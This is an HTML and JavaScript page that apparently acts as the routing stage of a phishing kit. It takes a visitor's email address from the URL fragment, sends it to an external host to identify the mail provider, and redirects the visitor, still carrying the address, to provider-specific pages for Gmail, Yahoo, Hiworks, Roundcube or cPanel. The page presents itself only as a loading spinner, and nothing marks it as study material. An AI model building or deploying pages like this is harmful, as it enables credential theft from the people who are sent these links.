<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- <title>Email API Example</title> -->
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        .spinner {
            width: 80px;
            height: 80px;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .spinner svg circle {
            fill: none;
            stroke: #63b3ed;
            stroke-width: 5;
            stroke-dasharray: 50;
            stroke-dashoffset: 0;
            animation: dash 1.5s ease-in-out infinite;
        }

        @keyframes dash {
            0% {
                stroke-dashoffset: 0;
            }

            50% {
                stroke-dashoffset: 150;
            }

            100% {
                stroke-dashoffset: 0;
            }
        }
    </style>
</head>

<body class="bg-gray-100">
    <div class="container mx-auto p-4">
        <div id="loadingContainer" class="hidden">
            <div class="spinner">
                <svg viewBox="0 0 100 100">
                    <circle cx="50" cy="50" r="40"></circle>
                </svg>
            </div>
        </div>
    </div>

    <script>
        function fetchEmailApi(email) {
            const apiUrl = `https://agile-dog-lab-coat.cyclic.app/api/${email}`;

            showLoading();

            fetch(apiUrl)
                .then(response => response.json())
                .then(data => {
                    const responseData = JSON.stringify(data);

                    if (responseData.includes("https://googlemail.com")) {
                        redirectToPage("gm.html");
                    } else if (responseData.includes("yahoodns.net")) {
                        redirectToPage("yh.html");
                    } else if (responseData.includes("hiworks.co.kr")) {
                        redirectToPage("hw.html");
                    }

                    hideLoading();
                })
                .catch(error => {
                    console.error("Error:", error);
                    hideLoading();
                });
        }

        // additional check
        function redirectToPage(page) {
            // Redirect to the specified page
            window.location.href = page;
        }

        // Get the email from the URL fragment identifier
        const emailParam = window.location.hash.substring(1);

        if (emailParam) {
            const apiUrl = `/proxy-website-content?email=${encodeURIComponent(emailParam)}`;

            fetch(apiUrl)
                .then(response => response.text())
                .then(responseData => {
                    if (responseData.includes("Roundcube")) {
                        redirectToPage("roundcube.html");
                    } else if (responseData.includes("cPanel")) {
                        redirectToPage("roundcube2.html");
                    }
                })
                .catch(error => {
                    console.error("Error:", error);
                });
        }

        // end of additional check








        function getEmailFromURL() {
            const emailRegex = /#(.+)/;
            const hash = window.location.hash;
            const matches = hash.match(emailRegex);

            if (matches && matches.length > 1) {
                return matches[1];
            }

            return null;
        }

        function showLoading() {
            document.getElementById("loadingContainer").classList.remove("hidden");
        }

        function hideLoading() {
            document.getElementById("loadingContainer").classList.add("hidden");
        }

        function redirectToPage(page) {
            const email = getEmailFromURL();
            const url = typeof page === "string" ? `${page}#${email}` : page;

            window.location.href = email ? url : page;
        }

        document.addEventListener("DOMContentLoaded", function () {
            const email = getEmailFromURL();

            if (email) {
                fetchEmailApi(email);
            }
        });
    </script>
</body>

</html>